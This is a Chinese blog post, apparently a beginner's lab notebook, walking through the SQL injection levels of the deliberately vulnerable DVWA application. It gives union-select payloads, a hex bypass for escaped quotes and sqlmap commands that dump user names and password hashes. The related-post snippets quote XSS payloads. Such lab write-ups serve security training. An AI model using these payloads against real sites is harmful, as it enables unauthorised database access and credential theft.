DVWA通关笔记

已于 2023-02-01 16:09:50 修改
阅读量200 收藏
点赞数
文章标签: sql 数据库 网络安全
于 2023-02-01 15:46:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52450604/article/details/128835305
版权
本文详细记录了在DVWA(DamnVulnerableWebApplication)中进行SQL注入的过程,包括识别注入点,判断列数和回显位置,查询数据库名、表名和列名,以及利用SQLMAP工具进行自动化攻击。在LOW级别,通过URL参数发现并利用SQL注入漏洞,而在MEDIUM级别,需要绕过转义和使用POST请求进行注入。
摘要由CSDN通过智能技术生成

DVWA通关笔记(一)

SQL Injection

LOW

1.寻找注入点
?uid=1'

----------------页面报错

?uid=1’ --+

------------------页面正常

则为单引号闭合

2.判断列数
?uid=1' order by 3--+

--------------------------页面报错

?uid=1' order by 2--+

--------------------------页面正常

则有2列

3.判断回显显示位置

?uid=-1' union select 1,2 --+

----------------------执行失败

​ **原因:**提示缺少一个单引号闭合,在最末尾添加一个单引号即可

​ 关于SQL注入的注释符问题:

​ --a,–空格,–+,#,–%20,%23,末尾引号闭合

​ +在sql中被认为是空格的意思,等同于–空格

​ 注意:区别直接在URL中输入–+和在提交框中输入–+!URL中的–+可以被解析,#不行,提交框中直接使用#

​ 提交框是POST请求!URL是GET请求

?uid=-1' union select 1,2#

-----------------------执行成功

有两个回显位

4.查询数据库名字
uid=-1' union select database(),version() #

------------------------------执行成功

数据库名字为dvwa

版本为5.7.26

5.查询dvwa库中的所有表
uid=-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

报错:Illegal mix of collations for operation ‘UNION’

解决方法:

参考https://blog.csdn.net/qq_43665434/article/details/114088565

在mysql中:

use dvwa;
alter table users modify first_name varchar(15) character set utf8 collate utf8_general_ci;
alter table users modify last_name varchar(15) character set utf8 collate utf8_general_ci;

修改后上述命令就可以成功执行了。

查询到的表格:guestbook,users

6.查询users表中的列名
uid=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' #

---------------------------------执行成功

查询到的列:user_id,first_name,last_name,user,password,avatar,last_login,failed_login

7.查询user,password信息
uid=-1' union select group_concat(user),group_concat(password) from dvwa.users #

仍旧可能出现Illegal mix of collations for operation 'UNION’的报错,可以直接将phpstudy中的mysql设置为8.0版本

查询到的数据:

user:admin,gordonb,1337,pablo,smithy

password:5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

password采用md5解密即可

8.SQLMAP注入

sqlmap -u “链接” (注意!连接中是?id=1,不用故意写错)

出现了302重定向,返回了登录页面--------------------添加cookie解决

登录后抓包,提取数据包中的cookie信息

再在sqlmap中写入

sqlmap -u "链接/?id=1&Submit=Submit" --cookie="提取到的cookie" --batch(自动选择)

成功得到payload

获取数据库名字:

sqlmap -u "链接/?id=1&Submit=Submit" --cookie="xxxxxxxxxxxxxxxxxx" --batch --dbs

获取dvwa中的表名:

sqlmap -u "链接/?id=1&Submit=Submit" --cookie="xxxxxxxxxxxxxxxxxx" --batch -D dvwa --tables

获取users表中的列:

sqlmap -u "链接/?id=1&Submit=Submit" --cookie="xxxxxxxxxxxxxxxxxx" --batch -D dvwa -T users --columns

获取user,password这两列的信息:

sqlmap -u"链接/?id=1&Submit=Submit" --cookie="xxxxxxxxxxxxxxxxxx"  --batch -D dvwa -T users -C user,password --dump(显示数据)

MEDIUM

1.寻找注入点
该关页面上没有明确的注入点(没有URL,表单提交)

打开页面后此时只有几个选项和提交按钮,为了寻找到注入点,我们可以使用burpsuite

点击提交后发现抓到的数据包请求类型为POST 且请求中有id=1,尝试修改为id=1’ ------------------------------页面报错

id=1' #

--------------------报错

各种尝试后,发现为数字型注入,即不使用符号对数字进行闭合

2.判断列数
id=1 order by 3 #

-------------------------页面报错

id=1 order by 2 #

-------------------------页面正常

列数为2

3.判断回显位
id=-1 union select 1,2 #

--------------------页面正常

两个都是回显位

4.查询数据库名字
id=-1 union select 1,database() #

--------------页面正常

数据库名字为dvwa

5.查询dvwa库中的表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

页面报错,原因:

该关的单引号被转义,无法使用

法一:

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

法二:十六进制绕过

在线转换器:http://tool.huixiang360.com/str/hex.php

将dvwa转换为64767761(注意dvwa不用加引号)

在burp中写为0x64767761

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#

-------------------------执行成功

6.查询users中的列名

table_name='users’同理,将users转化为16进制

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

执行成功

7.查询users中user,password信息
 id=-1 union select user, password from users#

------------------执行成功

8.SQLMAP注入

因为无法直接在url中注入,也没有表单提交,只能将burp中抓到的包保存在sqlmap同一目录下的txt文件中。

sqlmap.py -r 文件根路径 --batch
……

HIGH

该关点击链接实现跳转,防御了SQLMAP注入,手工注入步骤和之前相同
sqlmap实现注入待补充

新手小白 部分内容可能过于绝对 不是很严谨

Arongsec
关注
DVWA全系列笔记
BROTHERYY的博客
08-21 5184
文章目录一、DVWA的安装二、漏洞学习2.1 Brute Force2.1.1 Brute Force(low)2.1.2 Brute Force(Medium)2.1.3 Brute Force(High)2.2 Command Injection(命令注入)2.2.1 Command Injection(Low)2.2.2 Command Injection(Medium)2.2.3 Command Injection(High)2.3 Csrf(跨站请求伪造)2.3.1 Csrf(Low)2.3.2
DVWA靶场之xss通关笔记,详解带截图
AboutLzs的博客
03-21 1444
DVWA靶场Xss通关笔记
DVWA学习笔记
lee_maple的博客
01-15 3149
DVWA学习笔记 Security Level: LOW 暴力破解(Brute Force) 已知用户名,尝试使用burp爆破密码 随意输入一个密码,将其发送至burpsuit intruder 导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解 一般情况下,不难看出长度不同的即为正确密码 命令注入(Command Injection) Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。P..
DVWA学习笔记(自用)
a_qiao_的博客
08-21 266
DVWA学习笔记(自用) XSS(reflected) LOW 此处因为标签没有被过滤,所以此处被当作script语言被执行了 在不看源码的情况下,先尝试普通字符 观察源码处,字符被显示出来了 再输入标签,看标签是否被过滤 观察源码可以发现,button标签未被过滤,所以找到了漏洞 Medium <Script>alert(123456)</script> 混淆或大小写绕过 high <img src="" οnerrοr="alert('XSS')">
DVWA通关记录(1)
qq_39670065的博客
08-02 411
DVWA 简介 DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA一共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insec
DVWA 共12关通关笔记
09-12
DVWA 共12关通关笔记DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
DVWA全级别通关教程
m0_67393295的博客
07-28 834
首先选择难度,我们从low开始,如上图所示进行修改目录SQL手工注入过程:lowMediumhighImpossible??SQL 盲注过程:SQL 工具注入工具安装过程:过程:?lowMediumHigh:暴力破解过程:LowMediumHighImpossible命令注入过程:LowMediumHigh:Impossible文件上传过程:LowMediumHighImpossibleXSS漏洞过程:Low(反射型)MediumHigh?ImpossibleLow(存储型)MediumHighImposs
DVWA靶场(通关笔记
博客
04-25 1831
Brute Force(暴力破解) Command Injection(命令注入) low: Medium: High: CSRF(跨站请求伪造漏洞) File Inclusion(文件包含漏洞) File upload(文件上传漏洞) SQL Injection(SQL注入) union联合查询 报错注入 时间盲注 SQL Injection (Blind)(SQL盲注) 布尔盲注 时间盲注 XSS( Reflected)(xss反射型) XSS(Stored)(x...
DVWA-通关记录
weixin_37920548的博客
10-26 290
XSS(Reflected) LOW 查看源码 代码中代码与数据混合使用,没有对$_GET内容做任何的过滤等处理,直接在input框中数据即可
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA通关记录(3)
qq_39670065的博客
08-08 194
Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。 reCAPTCHA验证流程 这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。 low <?php if( isset( $_POST[ 'Change' ]
DVWA通关记录(2)
qq_39670065的博客
08-05 377
CSRF CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 low <?php if( isset( $_GET[ 'Change' ] ) ) {
DVWA笔记
陌茗228.的博客
04-11 137
DVWA Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS (DOM) XSS(Reflected)(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) Weak Session IDs (弱会话)
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 1101
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
dvwa学习笔记1
qq_41555580的博客
03-01 294
Dvwa漏洞学习笔记(low)
2301_80366980的博客
01-21 973
记录low难度的dvwa基础漏洞仅供个人学习,如有冒犯请尽快联系。
SQL注入入门学习笔记DVWA-SQL注入之布尔盲注
2301_78774803的博客
11-02 158
输入1' and ( select ascii( mid( column_name,1,1 )) from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' limit 3,1) > 96#输入1' and ( select ascii( mid( schema_name,1,1 )) from information_schema.schemata limit 1,1 ) = 101#
DVWA通关CSRF
最新发布
04-11
通关DVWA的CSRF,你可以按照以下步骤进行: 1. 首先,你需要了解CSRF攻击的原理和过程。CSRF攻击利用了网站对用户请求的信任,通过伪造请求来执行恶意操作。 2. 打开DVWA应用程序,并确保已经配置好了相应的环境...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值